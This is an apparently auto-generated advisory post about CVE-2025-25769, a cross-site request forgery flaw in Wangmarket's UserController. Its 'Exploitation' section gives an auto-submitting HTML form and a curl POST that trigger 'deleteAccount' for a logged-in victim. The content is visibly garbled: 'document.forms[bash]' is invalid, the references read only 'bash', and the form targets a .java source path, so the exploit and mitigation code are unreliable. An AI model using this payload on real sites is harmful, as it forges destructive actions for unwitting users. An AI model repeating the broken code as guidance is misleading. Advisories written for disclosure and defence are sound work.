Wangmarket, Cross-Site Request Forgery (CSRF), CVE-2025-25769 (Medium)

Listen to this Post

🐢▶️ Listen🚀

How the CVE Works:

CVE-2025-25769 is a CSRF vulnerability in Wangmarket v4.10 to v5.0, specifically in /controller/UserController.java. Attackers can craft malicious requests that, when executed by an authenticated user, perform unintended actions (e.g., account modifications, data deletion). The lack of anti-CSRF tokens allows forged requests to be processed as legitimate, exploiting the application’s trust in user sessions.

DailyCVE Form:

Platform: Wangmarket
Version: v4.10-v5.0
Vulnerability: CSRF
Severity: Medium
Date: 03/28/2025

What Undercode Say:

Exploitation:

1. Craft a malicious HTML form:

<form action="http://target.com/controller/UserController.java" method="POST">
<input type="hidden" name="action" value="deleteAccount">
</form>

<script>document.forms[bash].submit();</script>

2. Host on attacker-controlled site.

3. Trick authenticated users into visiting the page.

Mitigation:

1. Implement CSRF tokens:

String csrfToken = UUID.randomUUID().toString();
session.setAttribute("csrfToken", csrfToken);

2. Validate tokens server-side:

if (!request.getParameter("csrfToken").equals(session.getAttribute("csrfToken"))) {
throw new SecurityException("CSRF validation failed");
}

3. Use SameSite cookies:

Set-Cookie: sessionId=xyz; SameSite=Strict; Secure

Detection:

1. Scan with Burp Suite or OWASP ZAP for missing anti-CSRF headers.

2. Manual testing:

curl -X POST http://target.com/controller/UserController.java -d "action=deleteAccount"

Analytics:

• CVSS 4.0: 6.5 (Medium)
• Attack Vector: Network
• Privileges Required: Low
• User Interaction: Required
• Impact: Integrity

References:

• bash
• bash

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25769
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram